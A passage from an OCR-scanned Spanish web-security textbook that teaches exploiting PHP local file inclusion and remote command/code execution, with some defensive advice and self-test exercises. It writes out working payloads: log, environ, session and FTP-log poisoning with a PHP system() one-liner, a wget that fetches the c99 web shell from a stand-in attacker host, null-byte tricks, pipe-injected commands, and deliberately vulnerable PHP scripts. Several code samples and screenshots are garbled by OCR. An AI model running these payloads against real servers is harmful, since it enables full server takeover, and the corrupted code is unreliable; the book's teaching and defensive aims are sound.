
En este caso, supongamos que las inclusiones AL SERVIDOR 
remotas no están permitidas pero sí las locales. 
El código es vulnerable a LFI, por lo tanto >] > 
podemos ver el contenido de cualquier archivo del servidor web. 
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Figura 18. Mediante una vulnerabilidad tipo LFl podemos ver 
el contenido de diversos archivos interesantes alojados en el servidor. 


El objetivo es lograr subir una PHP shell al servidor, pero como sólo 
se permiten inclusiones locales, será más complicado que en el caso de 
RFI. Aun así, aprenderemos tres maneras diferentes de lograrlo. 


Envenenamiento de logs 


En los servidores Apache existe el archivo apache_error.log, un 
documento de texto o log que almacena los errores que se producen 
dentro del servidor. Anteriormente aprendimos a testear aplicaciones 
posiblemente vulnerables, pasándole a la función include un parámetro 
de valor inexistente, con el objetivo de producir un error. Esta falla se 
almacena en el log que corresponda, junto a la fecha, hora y dirección 
IP del cliente que realizó la acción, entre otros datos. 


D EXPLOTAR UN LFI 


Si bien nuestro objetivo es obtener el control total del servidor web, y lo podemos lograr subiendo una 
PHP shell, podemos hacer más aprovechándonos de esta vulnerabilidad. Existen numerosos archivos de 
configuración y del sistema que contienen datos muy interesantes para un atacante. En el Capítulo 8 


aprenderemos a visualizarlos mediante la explotación de un LF!. 
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Figura 19. Los errores que se producen dentro de un servidor web Apache 
se almacenan en el archivo de log apache_error.To0g. 


El log de errores almacena textualmente el valor que le pasamos a la 
función require (que, como vemos en la Figura 19, es: “cualquiercosa”). 
Lo interesante es que, en lugar de esa palabra, podemos inyectar 
dentro de este archivo un simple código PHP que nos permita ejecutar 

comandos en el servidor. La función system se encargará de hacerlo. 
Aprovecharemos el LFI que hayamos encontrado en la aplicación web 
para generar un error, de la siguiente manera: www.sitio.com/index. 
php?pag=<?php system($_GET[*cmd”]) ?>. Así, almacenamos en el log de 
errores de Apache un pequeño script PHP: <?php system($ GET['cmd]) ?>, 
que mediante la función system posibilitará la ejecución de comandos 
dentro del servidor web. 

Después de inyectar el script PHP (acto que también se conoce como 
envenenamiento de logs) tenemos que encontrar la ubicación exacta 


D ENVENENAMIENTO DE LOGS 


Se trata de una técnica que inyecta un pequeño script PHP dentro de uno de los archivos de logs. 
El objetivo es poder ejecutar comandos en el servidor y así descargar una PHP shell dentro de éste. 
El apache_error.log no es el único documento que almacena acciones de los usuarios. Existe también 


el access.log que, si bien no guarda errores, permite encontrar la manera de realizar el envenenamiento. 
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del apache_error.log, mediante el LFI que poseemos (en sistemas Linux, 
la ubicación de este archivo podría ser: /var/log, /var/log/apache, /usr/ 
local/apache/logs, /opt/xampp/apache/logs, etcétera). Una vez que lo 
encontramos, ejecutamos los comandos: www.sitio.com/index.php?pag=../ 
logs/apache_error.log8cmd=!s. 
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Figura 20. Ejecutamos comandos en el servidor “envenenando” 
los logs de errores de Apache mediante un LF. 


Tal como observamos en la Figura 20, ejecutamos un comando que 
nos muestra el listado de carpetas y archivos que se encuentran en la 
ubicación actual. En el caso de Linux ejecutamos ls y, en Windows, dir. 

Lo último por hacer es subir la PHP shell al servidor web, haciendo uso 
de un comando como wget y descargándola allí mismo: www.sitio.com/index. 
php?pag=../logs/apache_error.logécmd= wget http://sitioataque.com/c99.php”. 

El envenenamiento de logs no es la única vía para obtener una PHP 
shell en el servidor explotando un LFI. A continuación, conoceremos 
al menos otros dos modos de lograrlo. 


Eco en include 


Dentro del sistema de archivos proc que posee Linux, existe la 
ruta /self/environ; si accedemos a través de nuestro navegador web 
podremos ver los datos de la petición HTTP realizada, tal como si 
se tratara de un reflejo o eco. 
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Dentro de las cabeceras HTTP que quedan almacenadas 
temporalmente en este archivo, podemos visualizar la del User-Agent 
que, como hemos aprendido en el Capítulo 3, contiene datos sobre 
nuestro navegador web y sistema operativo, entre otros. La base de 
esta técnica es inyectar en el archivo /proc/self/environ un script que se 
encargue de descargar la PHP shell dentro del servidor web. 

La cabecera User-Agent puede ser modificada fácilmente, por ejemplo, 
mediante el complemento para Firefox User-Agent Switcher (compatible 
con la última versión del navegador). Al igual que con cualquier otro 
add-on, una vez instalado ingresamos al menú Edit User Agents y 
presionamos New para crear uno nuevo. 

En este caso, el único campo que nos interesa es User Agent, y 
reemplazamos su contenido por: <?php system('wget http://sitioataque. 
com/c99.txt -0 shell.php*);?>. Se trata del script que descargará al 
servidor la PHP shell c99 en modo texto, y luego la renombrará 
como shell.php. 


PS 


pa ha alot Po + 


7 
UNOr Mapas Baal er Dra ú 
dores 


Pda os Uns Aqerd Gore hr Tae meras AS 


s4 ( 
4 Vu Agente Mana es Aque Ú 


yg ho 09 en got Pet lapa im 0 O slip 


Figura 21. Editamos el agente de usuario para realizar 
una inyección a /proc/self/environ. 


Una vez guardado, seleccionamos el nuevo User Agent que hemos 
creado como agente por defecto, desde el menú de herramientas de 
Firefox. A continuación debemos ingresar nuevamente a la ruta /proc/ 
self/environ, mediante el LFI que posea la aplicación vulnerable (por 
ejemplo, www.sitio.com/index.php?pag=../../proc/self/environ). 
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De este modo, veremos nuestro nuevo agente de usuario inyectado 
temporalmente en dicha ruta y, al recargar por última vez la página, 
se ejecutará el script que descarga en el servidor web la PHP shell. 

Debemos saber que no siempre se puede acceder a este archivo 
mediante una aplicación vulnerable, ya que el acceso depende de 
los permisos y configuraciones que posea el sistema sobre la ruta 
Iproc/self/environ. Si somos los administradores del servidor, es 
importante que nos aseguremos de que no sea accesible a través 
de un navegador web. 


Sesión envenenada 


Veamos ahora la última manera de obtener una PHP shell en el 
servidor web explotando la vulnerabilidad de Local File Inclusion. 
Esta vez serán envenenadas las sesiones de usuario. 

Supongamos que la aplicación web posee un código PHP similar 
al siguiente: 


<?php 
$usuario = $ GETl'usuario”); 
session_start(); 
session_register(“usuario”); 
2> 


Este simple código crea una sesión de usuario usando un valor 
obtenido mediante GET, sin realizar ningún tipo de verificación. Por 
lo tanto, le pasaremos a la variable el siguiente valor: <?php system($_ 
GET['cmd”]) ?>, quedando la dirección URL como: www, sitio.com/ 
index.php?usuario=<?php system($_GET['cmd”)) ?>. 

Si, una vez ejecutado el código vulnerable, verificamos la cookie que 
se nos ha asignado, veremos algo similar a lo siguiente: PHPSESSID=i17 
j6b3urdfp52nplicg9euhjl. 

Nuestro nombre de usuario (que, en este caso, se trata 
de: <?php system($ GET['cmd”]) ?>) queda guardado en el archivo 
que almacena los datos de la sesión. Mediante esta técnica, lo 
hemos envenenado con el script PHP que nos da la posibilidad de 
ejecutar comandos. 
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Figura 22. Desde las opciones de Firefox podemos 
ver fácilmente cuál es la sesión que nos asignó el sitio. 


El siguiente paso es utilizar el LFI que tenemos para ubicarnos en la 
carpeta tmp, que contiene los archivos temporales (sesiones de usuario 
y demás) y pasarle a la variable cmd el comando a ejecutar: www.sitio. 
com/index.php?pag=../tmp/sess_ ¡17j6b3urdfp52npllcg9euhjlé8cmd=!s. Al final 
de la sesión le agregamos é:cmd=!s, para poder visualizar los archivos 
que contiene el directorio actual. 
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Figura 23. Logramos ejecutar comandos 
en el servidor web a través de una sesión envenenada. 
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Hasta aquí, hemos aprendido a detectar y explotar las 
vulnerabilidades de Remote File Inclusion y Local File Inclusion, 
apoderándonos por completo del servidor web mediante una PHP 
shell o shell inversa. Pero, si nuestro papel es el de desarrolladores o 
administradores de un sitio, debemos saber cómo evitar estas mismas 
fallas de seguridad en la programación de las páginas web. 


== Solución al problema 


A esta altura del capítulo, ha quedado bien claro el peligro que supone 
el uso de funciones PHP como include y require, que permiten la inclusión de 
archivos, sin tomar las respectivas medidas de seguridad. A continuación 
analizaremos una manera de impedir las inclusiones remotas y luego 
aprenderemos a controlar o programar de modo seguro las inclusiones 
locales, a fin de impedir ataques que aprovechen este tipo de fallas. 


Deshabilitar la inclusión de archivos 


Lo ideal, siempre, es evitar por completo el peligro. Si nuestro 
sitio web no contiene ningún código que realice inclusiones remotas, 
deberíamos deshabilitar la posibilidad de incluir documentos externos 
dentro del servidor web. 

Para hacerlo, debemos abrir el archivo de configuración php.ini 
con cualquier editor de texto y buscar la directiva allow_url_include. Si se 
permiten las inclusiones de archivos remotos, lo veremos indicado con 
un simple On en esa misma directiva. Para deshabilitarlo, reemplazamos 
el On por 0ff y luego guardamos el archivo y reiniciamos el servicio. 


"444 


O NULLBYTE 


Se trata de poner un %00 al final de la dirección URL que explota un LFI, por ejemplo: www.sitio. 


com/?pag=../proc/self/environ%00. Se utiliza para que el servidor pase por alto todo lo que viene 
después del %00. Si el código vulnerable fuera similar a include($ GET['pag']. “/config.php”), ignorará 
config.php de modo que el LF se realice con éxito. 
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Figura 24. Para evitar el peligro que envuelven 
las inclusiones de archivos remotos, deshabilitamos 
la posibilidad de hacerlo desde el php.ini. 


De esta manera estaremos seguros de que, aún si hubiera en 
nuestro servidor una aplicación web vulnerable a RFI, el atacante no 
podrá llevar a cabo las técnicas mencionadas, ya que la posibilidad de 
incluir documentos externos estará deshabilitada. Al intentarlo se 
observa un error similar al de la Figura 25. 


cr prime arado rm | | 
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Figura 25. Al intentar llevar a cabo una inclusión remota veremos 
que se genera un error, avisando que tal posibilidad está deshabilitada. 
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Filtrar variables 


Siempre es conveniente no utilizar las funciones PHP que 
permiten realizar inclusiones pero, en aquellos casos en que se 
vuelve realmente necesario hacerlo, debemos aprender a controlar 
los archivos que se van a incluir. 

Lo importante en estos casos es impedir que el atacante pueda 
modificar el documento que va a incluir, para lo cual debemos 
programar un código PHP que realiza una verificación antes de llevar 
a cabo la acción de inclusión: 


<?php 
$paginas = array('contacto.php”, 'empresa.php' ); 
foreach ($paginas as $pagina) 


if(isset($_GETE'pag'DM 
if ($_GETT'pag'1== $pagina)M 


include $ GETL'pag”1; 


2> 


Dentro del array (paginas) debemos escribir todos los documentos 
que puedan ser incluidos. Luego, en la quinta línea del script, se realiza 
la verificación: si la variable GET (pag) coincide con alguno de los 
valores del array, entonces se incluye el archivo correctamente. De lo 
contrario, no se ejecutarán las acciones. 


DN FTP LOG 


Quizás exista dentro del servidor web un archivo de log que almacene los accesos al FTP. Por lo tanto, 


"LAS 


tenemos a la vista otro registro que podemos envenenar. Para hacerlo debemos intentar conectarnos al 
FTP con el siguiente nombre de usuario: <?php system($_GET[“cmd”]) ?>. Luego, mediante el LFI, busca- 
mos la ubicación del log para ejecutar los comandos. 
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Figura 26. Existen muchas maneras de programar un filtro 
en PHP que verifique si el archivo que se va a incluir es el correcto. 


"AS 


a RESUMEN 


Conocer las técnicas de Remote File Inclusion y Local File Inclusion resulta imprescindible para introducir- 
nos en el ámbito de la seguridad informática referente a la plataforma web. En este capítulo aprendimos 
en qué consisten las inclusiones de archivos locales y remotos, conocimos las PHP shells más populares 
y realizamos una shell inversa. Programamos códigos vulnerables a RFI/LFI para realizar prácticas y 
obtuvimos el control total del servidor web subiendo una shell a éste, explotando esta vulnerabilidad de 
tres modos diferentes. Por último, desde el lado de la defensa de un servidor web, deshabilitamos las 


inclusiones de archivos externos y programamos un código seguro para incluir documentos locales. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


1 ¿Qué significa el concepto inclusión de archivos? 
2 ¿Qué utilidad tienen las inclusiones de archivos? 


3 ¿Cuáles son las funciones PHP que nos permiten incluir documentos internos y 
externos en el servidor? 


¿Qué diferencias existen entre las inclusiones locales y las inclusiones remotas? 
¿Qué es una PHP shell y para qué sirve? 
¿Cuáles son las ventajas de obtener una shell inversa? 


¿Cómo podemos subir una PHP shell al servidor web explotando un RFI? 


0 3 O gg 


¿Cuáles son las tres formas diferentes de subir una PHP Shell al servidor explo- 
tando un LFI? 


9 ¿Cómo podemos deshabilitar las inclusiones de archivos remotos? 


EJERCICIOS PRÁCTICOS 


1 Programe un script vulnerable a RFl y LFI. 
Investigue las herramientas de las PHP shells c99 y r57. 


3 Ejecute una shell inversa en un servidor web y reciba la conexión 
en su computadora. 


4  Envenene los logs de un servidor Apache mediante la técnica de LF. 


5 Cree un filtro en PHP para poder realizar inclusiones locales de forma segura. 


hs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Sabemos lo peligroso que puede ser que un atacante 


ejecute comandos de forma remota en nuestro servidor web. 
Remote Command Execution aprovecha fallas de seguridad 
en el uso de funciones PHP que permiten ejecutar comandos. 
Por otro lado, Remote Code Execution aprovecha descuidos 


en el uso de eval(). 
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Introducción 


System(), al igual que exec(), passthru() y otras funciones PHP, permite 
ejecutar comandos sobre el sistema operativo que utilice el servidor. 
En el capítulo anterior, acerca de la inclusión de archivos, luego de 
realizar un envenenamiento de logs utilizamos la función system() para 
descargar una shell dentro del servidor web. Así, nos dimos cuenta del 
peligro con el que debe lidiar el administrador de un sitio ante el hecho 
de que un atacante utilice estas funciones en su aplicación. 

Remote Command Execution (RCE) o, en español, Ejecución Remota 
de Comandos, hace referencia a la posibilidad de que un atacante logre 
ejecutar comandos sobre el sistema operativo que tenga por objetivo. 
Dentro del campo web, la vulnerabilidad de RCE apunta 
al mal uso de las funciones PHP nombradas anteriormente. Al igual que 
en el caso de include() y require(), si un programador no filtra bien los 
datos que reciben como parámetros dichas funciones, el atacante las va 
a utilizar para otro fin, muy diferente al que realmente tienen. 


Remote Command Execution 


www.sitio.com/?cmd=Is 
Á Oo _—_—_—_— 


Hacker Aplicación web 
vulnerable 


Figura 1. Una aplicación web que utilice funciones como exec () 
o system() puede terminar siendo víctima de un ataque. 


Remote Code Execution o, en español, Ejecución Remota de Código, 
es otra vulnerabilidad que analizaremos en este capítulo. La función 
eval() de PHP evalúa o interpreta una cadena de caracteres como código 
de este lenguaje, es decir, ejecuta como código PHP todo lo que se le 
pase como parámetro. No hay que imaginar demasiado para saber lo que 
un atacante podría hacer si una aplicación web utilizara esta función, 
recibiendo como parámetro datos asignados por el usuario. 
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Remote Code Execution 


www.sitio. ona. Secc sos slds: 3 phpinfo(); 


Hacker Aplicación web 
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Figura 2. Eval () es una función que interpreta como código 
PHP la cadena de caracteres que reciba como parámetro. 


Comprendiendo el funcionamiento de eval(), 


sería totalmente válido pasarle como parámetro SYSTEM() PERMITE 
un código similar a este: system('Is');, que de hecho EJECUTAR 
podría interpretarse como un ataque de ejecución 
remota de comandos. Pero la principal diferencia COMANDOS SOBRE EL 
entre Remote Code Execution y Remote Command SISTEMA OPERATIVO 
Execution radica en la aplicación vulnerable. 

En las próximas dos secciones del capítulo DEL SERVIDOR 
analizaremos respectivamente cada vulnerabilidad 
y las diferencias que hay entre ambas, a fin de sy 
identificar correctamente los errores de programación que permiten 


explotar tales fallas. 

Desde el lado del atacante, y con un poco de imaginación, 
lograremos obtener información sumamente interesante sobre el 
servidor que estemos atacando y obtener su control total. Desde el lado 
del programador, será útil analizar los filtros que pueden brindar una 
falsa sensación de seguridad y aprender cómo resolver el problema. 


DN MÁS ALLÁ DE PHP 


Las vulnerabilidades de tipo RCE no se limitan solo al lenguaje PHP. Funciones como las tratadas en este 
capítulo también se encuentran en otras tecnologías web. Por otro lado, pueden encontrarse también 


fallas en software de escritorio que permitan a un atacante ejecutar comandos en el sistema. 
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Ejecución remota 
de comandos 


Es lo que todo atacante quiere lograr sobre su objetivo: ejecutar 
comandos de manera remota (sin tener acceso físico a la maquina) y, 
en lo posible, con privilegios de administrador. 

Algunas aplicaciones o sitios web programados en lenguaje PHP 
pueden utilizar, en alguna parte de su código, funciones que permiten 
la ejecución de comandos sobre el sistema que contiene el intérprete 
de dicho lenguaje. 


Funciones peligrosas 


En realidad, la peligrosidad dependerá de quién las use, cómo y con 
qué fin. Si bien para la mayoría de los programadores las funciones PHP 
que ejecutan comandos son sólo más código útil para sus aplicaciones, 
no representan lo mismo para un Black Hat Hacker. Para ellos, 
encontrarse con una aplicación vulnerable a RCE puede ser lo mejor 
que les suceda en el día. 

En cambio, para un administrador de seguridad, sí es un verdadero 
peligro que sus aplicaciones sean vulnerables a éste tipo de fallas. 

Si somos profesionales de la seguridad encargados de proteger 
determinadas aplicaciones web, el hecho de que utilicen funciones 
como system() probablemente nos traiga graves problemas. En adelante 
sabremos por qué. 

A continuación, analizaremos cuatro funciones PHP programadas 
para la ejecución de comandos en el sistema operativo. Las cuatro 
ejecutan lo que se le pase como parámetro, pero la diferencia radica 


uv VW 


DN VULNERABILIDADES EN ACTIVE SERVER PAGES 


Active Server Pages (ASP) es un lenguaje de programación para la creación de sitios web, ejecutado 


del lado del servidor (al igual que PHP) y desarrollado por Microsoft. Las aplicaciones ASP también pue- 
den poseer vulnerabilidades, ya que son capaces de hacer evaluaciones de código dinámicas, entre otras 
acciones que pueden poner en riesgo al servidor si no se controlan adecuadamente. 
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Piar” PA, 


Miro su Mena le 
$ sn Mu ¿PARO 
ID tresiór de Conos Y 0 LS honor Gl mago ette E crime: 1 Canos Y cos DO Tits E dr e pen “O 


contral de peoreena — (Iv 4 0 5) 


Pecucón de System” — Ejeicar Le pragrama axtemno y PoStrar se nabos 
pengurms 


— Lhasa apre s Oe Ae a 28 
[urna eyatem (stoy dere |, int Abre tera vr 1) 


aye ) es sordo e la versión C de le tunción de mero nombre. dedo qui Eon dl command dado y muestra e restado. 


La derma + NG) Lem er ri UN O it e ains ll a rr dy rta le cd o 6 ls a PI e a os os o ad 
de perdor 


Ma recusta ejecutas 10 COMAndo y rectar de veta todo la 0010s del mem sn eLoter eras yes la Pc partir) 


= lay asmotros tee 
mon e 
E comando que sera excutado 


IA rr a ren retera_ vr 


— __._ _ o __—___—_—_—_—_ _ ___ — _——— 


Figura 3. En la página oficial de PHP 
(www.php.net) podemos encontrar más información 
sobre las funciones que trataremos en este capítulo. 


System/) 

Para ser exactos sobre su funcionamiento, podemos consultar la 
página www.php.net: “system() es similar a la versión C de la función 
del mismo nombre, ya que ejecuta el comando dado y muestra el 
resultado”. 

Programemos un script simple para realizar prácticas: 


<?php 

Sejecutar = $ GET'cmd'); 
system($ejecutar); 

2> 


Luego, le pasamos a la variable $ejecutar un comando a través 
de la URL (por ejemplo, Is o dir, en caso de que se utilice el sistema 
Windows). A continuación, nos mostrará en pantalla el listado de 
archivos y directorios de la posición actual: 
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Directorio de C:lwamplwwwWWebsVulnerables 29/01/2013 02:18 a.m. 
. 29/01/2013 02:18 a.m. 

.. 22/07/2012 04:49 a.m. 

1.133 BuscadorXSS.php 21/07/2012 04:29 a.m. 

1.979 Formulario.php (...). 


Figura 4. Salida en pantalla de la ejecución 
de un comando a través de la función PHP system(). 


Exec[() 

La función exec() de PHP también ejecuta el comando que se le pase 
por parámetro. Lo que diferencia a system() de exec() es que esta última no 
imprime en pantalla la salida del comando ejecutado. Código de prueba: 


<?php 
exec($_POST['cmd”7); 
?> 


En este caso, el parámetro se pasa por POST, lo que significa que 
necesitaremos usar aplicaciones como el complemento Tamper Data 
para lograr nuestro objetivo. Por otro lado, si queremos visualizar la 
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salida del comando, debemos agregar una línea para imprimir 
la ejecución en pantalla, utilizando print o, en su defecto, echo. 


Passthru() 


La definición para esta función, según el sitio oficial de PHP es: 
“La función passthru() es parecida a la función exec(), que ejecuta un 
comando. Esta función debería ser usada en lugar de exec() o system() 
cuando la salida desde la línea de comandos de Unix sean datos 
binarios, los cuales sea necesario pasar directamente al navegador”. 

Código de prueba: 


<?php 

function cmd($comando)( 
passthru($comando); 

) 

Sejecutar = $ GETL'cmd'); 

cmd(Sejecutar); 

?> 


La función passthru() muestra la salida en pantalla, sin necesidad 
de especificarlo. 


Figura 5. Respuesta a la ejecución de un 
comando con la función PHP passthru(). 
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shell_exec[() 

Esta es otra función PHP para la ejecución de comandos. Como 
dijimos, la diferencia entre todas radica en el modo de mostrar al 
programador el resultado de la ejecución. Esta vez php.net aclara: 
“shell_exec — Ejecutar un comando mediante el intérprete de comandos 
y devolver la salida completa como una cadena”. 

Código de prueba: 


<?php 

$salida = shell_exec($_GETE'cmd”)); 
print $salida; 

?> 


En el caso de Shell_exec() también debemos agregar una línea usando 
print o echo para ver la salida del comando en pantalla. 

Una vez analizadas las funciones PHP que otorgan la posibilidad 
de ejecutar comandos en el servidor, pudimos entender cómo 
funcionan y en qué se diferencian. Antes de ingresar de lleno en 
la explotación de las vulnerabilidades tipo RCE, debemos aprender 
otro aspecto importante sobre la ejecución de comandos, muy útil 
cuando llevemos los ataques a la práctica. 


Uso de pipes 

Las pipes Ln representadas con el símbolo */”, se utilizan 
tanto en Windows como en Linux para redireccionar la salida de un 
primer comando hacia la entrada del segundo. Para entenderlo mejor, 
veamos un ejemplo. 


D UNA VULNERABILIDAD POCO COMÚN 


El sitio oficial de PHP desaconseja por completo la utilización de las funciones tratadas en este ca- 
pítulo. Al ingresar a la Ayuda de cada una de estas funciones, podremos ver carteles que advierten 
sobre los peligros que envuelve incluirlas en nuestro código. Gracias a ello la cantidad de sitios 


vulnerables a RCE son cada vez más escasos. 
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Como sabemos, el comando ls en Linux muestra un listado con 
los directorios y archivos de la posición actual. Supongamos ahora 
que queremos ordenar ese listado de alguna manera, mediante el 
comando sort. Para hacerlo, deberíamos guardar la salida del comando 
Is dentro de un archivo, para luego pasárselo como entrada a sort y que 
muestre su contenido en el orden que le indiquemos. De esta manera, 
mínimamente requerimos ejecutar dos comandos por separado, pero 
mediante el uso de pipes la tarea se simplifica, con una sola línea. 


Figura 6. En primer lugar se ejecutan los dos comandos 
por separado. Luego, simplificamos haciendo uso de una pipe (|). 


Mencionamos este detalle porque las aplicaciones vulnerables a 
RCE que encontramos en la web no son tan simples como <? system($_ 
GET['cmd”]); ?>. Cuando una aplicación web utiliza estas funciones, 
lo hace con el objetivo de realizar una tarea que tenga sentido, 
complejizando el código vulnerable. Entender el uso de pipes nos 
ayudará en la práctica a explotar las aplicaciones vulnerables a RCE. 


Ejecución remota de código 


En lugar de comandos, esta vez buscaremos ejecutar nuestro código 
PHP sobre el servidor web que tengamos por objetivo. Esto nos permitirá, 
desde el lado del atacante, obtener el control total del servidor, como en 


www.detodoprogramacion.com www.redusers.com 


205 


« 


206 (MES 7. EJECUCIÓN REMOTA DE CÓDIGO 


el caso de Remote Command Execution. De hecho, poder ejecutar código 
PHP nos da más alternativas de ataque que solo ejecutar comandos, ya 
que es posible, en definitiva, ejecutar cualquier función PHP. 

La vulnerabilidad Remote Code Execution se basa en los errores 
de seguridad que pueden producirse al utilizar una función PHP 
que permite, precisamente, la ejecución de código de este lenguaje 
dentro del servidor web. Si bien esta falla no es común, debido a las 
advertencias que se dan al respecto, es clave comprender cómo se 
produce la vulnerabilidad para erradicarla de nuestras aplicaciones 
y evitarla en futuros proyectos web. 


Función eval() 


Tal como mencionamos, la función eval() evalúa o interpreta la cadena 
de caracteres que reciba por parámetro, como código del lenguaje PHP. 
Su uso está totalmente desaconsejado. Imaginemos qué sucedería si 
utilizáramos esta función recibiendo parámetros asignados por el usuario. 
Dependiendo de sus intenciones, éste podría usar la aplicación con fines 
diferentes a los originales y apoderarse de nuestro servidor web. 


AI Ma o. on 


eme sea Enter - 3 ev) La captado 00 E de 101 


- Deserpuón tr 


mero eva | ama E e 


» de Evita e Codgo Gate por cade coma cono PP 


Poca 
E AITOR CA) E e pair A TIA A A de DS Da DI e e std arto desacirse jads. 
£ sm ha vertcado CuUÉalOsaMera e 10 EXE DA SLOGAN, 4 da de poner espe Mención en 00 pasar ninguea 
MOTMICIÓN DIOPOTCOADES IO ES UBADOÍO 2 2 AAA DO PATA CTD SA A RANA 


= Parámesros RO 1 a 


Figura 7. Si entramos a la ayuda de eval () que proporciona 
el sitio www.php.net encontraremos una advertencia sobre su uso. 


Existen dos aspectos importantes a tener en cuenta para 
utilizar eval() correctamente. Primero, el código que le pasemos 
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como parámetro a la función no debe encerrarse entre las etiquetas 
de apertura (<?) y cierre (?>) de PHP. Segundo, siempre debe 
incluirse el punto y coma (;) al final del código a ejecutar. Por 
ejemplo: echo “hackers”;. 

A continuación veremos un ejemplo sencillo del uso de eval(): 


<?php 

$codigo_php = $ GET['codigo”); 
eval($codigo_php); 

2> 


Si bien podemos asignarle a la variable $codigo_php cualquier 
función que se nos ocurra de este lenguaje, haremos una ejecución 
simple para verificar el correcto funcionamiento del script. Para ello, 
pasamos el parámetro a través de la URL de la siguiente manera: 
sitio.com/rce.php?codigo=echo “Hackers”;, y obtenemos una salida 
similar a la de la Figura 8. 


$ datos 3] 0-44 


Figura 8. La función eval () interpreta como código PHP 
cualquier cadena de caracteres que se le indique como parámetro. 


Aprendimos cómo operan cada una de las funciones que involucran 


las vulnerabilidades de Remote Code Execution y Remote Command 
Execution. Es momento de ver ejemplos reales de aplicaciones 
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vulnerables y, por supuesto, convertirnos en atacantes por un rato para 
conocer cómo explotar tales fallas. Nuestro objetivo será obtener la 
mayor cantidad posible de información sobre el servidor y, finalmente, 
apoderarnos de él. 


El ataque como defensa 


Saber atacar es la mejor defensa. Si nos ponemos en la piel del 
atacante comprenderemos las técnicas utilizadas para explotar las 
fallas de seguridad mencionadas, y a la vez, descubrir o idear cómo 
evitar que sucedan. 

A continuación analizaremos ejemplos realistas de RCE con cada una 
de las funciones aprendidas en las secciones anteriores del capítulo. En 
los diversos escenarios, iremos obteniendo información útil hasta, por 
fin, conseguir el control total del servidor web. 


Quiénes somos y dónde estamos 


Primer escenario: una aplicación cuya función es realizar un ping a 
la dirección IP que se le indique. Hay muchas herramientas online que 
cumplen funciones de este tipo. Vamos a imaginar que el código de una 
de ellas es similar al siguiente: 


<?php 

error_reporting(0); 

ifCisset($ POSTE ip DM 
$direccionIP = $_POSTI'ip”]; 
Sejecutar = "ping “.$direccionIP; 
system($ejecutar); 

) 


2> 


Análisis del código vulnerable a RCE: La dirección IP se asigna a la 
variable $direccionIP mediante un formulario que trabaja por método 
POST. Algo importante a tener en cuenta para realizar una futura 
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explotación es que la variable $ejecutar concatena la palabra ping a la 
dirección IP recibida, lo que significa que siempre tendrá que llevarse a 
cabo tal actividad, ya que no es posible editar el código fuente y borrar 
el ping. Por último, se ejecuta la tarea mostrando el resultado en 
pantalla a través de la función system(). 


DIRECCION IP: 


186.57.187150 Ping | 
Resultado: 


Haciendo ping a 1286.57.1€7.150 con 32 bytes de datos: 
Respuesta desde 185.57.187.150: bytes=32 tiempo=2ms I11=54 
Respuesta Jezds 155.57.187.150: bytes=32 tiempo=4ms ITL=54 
Respuesta desde 1£85.57.187.150: byres=32 tiempo=2m= TIL=54 
Respuesta desde 1£85.57.187.150: bytes=32 riempo=2ms TIL=54 


Estadísticas de ping para 186€.57.187.150: 
Paquetes: enviados = 4, recibidos = 4, perdidos = 0 
(0% perdidos), 
Tiempos aproximados de ida y vuelta en milisegundos: 
Minino -— 2m5, M ximo - £ms, Media -— 2ms 


Figura 9. Aplicación vulnerable a RCE, encargada 
de realizar un ping a la dirección IP que se le indique. 


Hemos llegado a la parte más interesante. Explotaremos la aplicación 
vulnerable a RCE y obtendremos los primeros datos sobre el servidor 
web: quiénes somos y dónde estamos. 

Como bien dijimos, el ping es inevitable; se realizará de todas 
maneras. Entonces, para ejecutar el comando que queremos, debemos 
hacer uso de las mencionadas pipes o tuberías (|). Podemos hacer una 
prueba en nuestra propia computadora, ejecutando un ping seguido del 
comando que queremos, mediante el uso de una pipe (como podemos 
ver en la figura 10). 


"444 


HO DVWA 


Damn Vulnerable Web Application (DVWA) es una aplicación web diseñada intencionalmente con una 
gran cantidad de vulnerabilidades. Ofrece, así, un entorno de aprendizaje para poder llevar a la práctica 
conocimientos sobre vulnerabilidades web, de manera legal, ya que no se compromete ningún sistema. 


www.detodoprogramacion.com www.redusers.com <« 


210 7. EJECUCIÓN REMOTA DE CÓDIGO 


Figura 10. Practicamos en nuestra computadora el uso 
de pipes antes de utilizarlas en la aplicación web vulnerable a RCE. 


Ahora sí, volvemos a la aplicación vulnerable a RCE. En primer lugar, 
ejecutaremos el comando uname -a para conocer frente a qué sistema 
nos encontramos y, por otro lado, el comando pwd para saber cuál es el 
directorio actual. También podemos ejecutar un ls para ver las carpetas 
y archivos que se encuentran alojados en el servidor web. En resumen: 
tenemos una terminal abierta dentro de nuestro objetivo. En la Figura 
11 observamos los resultados obtenidos en este caso. 


DIRECCION 1P: 


Merultade 


DIRECCION IP: 


Kesaltado 


Figura 11. En la ventana superior, la salida del comando 
uname -a, y en la inferior, la salida del comando pwd. 
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Procesos y servicios 


Segundo escenario: un pequeño script que forma parte de una 
aplicación compleja, con la función de solicitar un directorio al que 
debe desplazarse y mostrar la nueva ubicación en pantalla. 


<?php 

error_reporting(0); 

$path = $ GETE'path"); 

$comando = “cd “.$path."* £ 8 pwd”; 
$directorio = exec($comando); 

print $directorio; 

2> 


Análisis del código vulnerable a RCE: asignamos el nuevo directorio 
mediante la URL, ya que el script utiliza GET como método de envío de 
datos. Al igual que el ejemplo anterior, el comando se ejecutará siempre, 
por lo que usaremos pipes en la futura explotación. La función exec() no 
muestra la salida en pantalla, por lo cual se agrega la línea print al final 
de la aplicación, de modo que se imprima la nueva ubicación. 


d+) 192,168.14 103/WebsVuinerables/path. ph 


laopt/servidor/www/sitio/ 


Figura 12. Aplicación vulnerable a RCE. Se desplaza 
al directorio asignado y luego muestra la ubicación en pantalla. 


Explotación del RCE: seguimos obteniendo información 
interesante sobre el servidor web. Esta vez, consultaremos la lista 
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de procesos mediante el comando ps -ax y utilizaremos una pipe, 
como en el caso anterior, de modo que la URL quede de la siguiente 
manera: sitio.com/rce.php?path=/ruta | ps —ax. 

Dentro de la aplicación vulnerable el comando quedaría similar 
a cd /ruta | ps -ax € 8 pwd, por lo que al final de la lista imprimirá 
también el directorio actual. 


Figura 13. Mediante un RCE podemos obtener todo 
tipo de información útil sobre el servidor web. 


Conexiones del servidor 


Tercer escenario: un script que forma parte de otra 
aplicación. Recibe un archivo mediante la URL y muestra 
su contenido en pantalla. 


HO EL LÍMITE ES NUESTRA IMAGINACIÓN 


Una aplicación vulnerable a RCE puede poner en peligro todo el servidor web. En resumen, funciona 


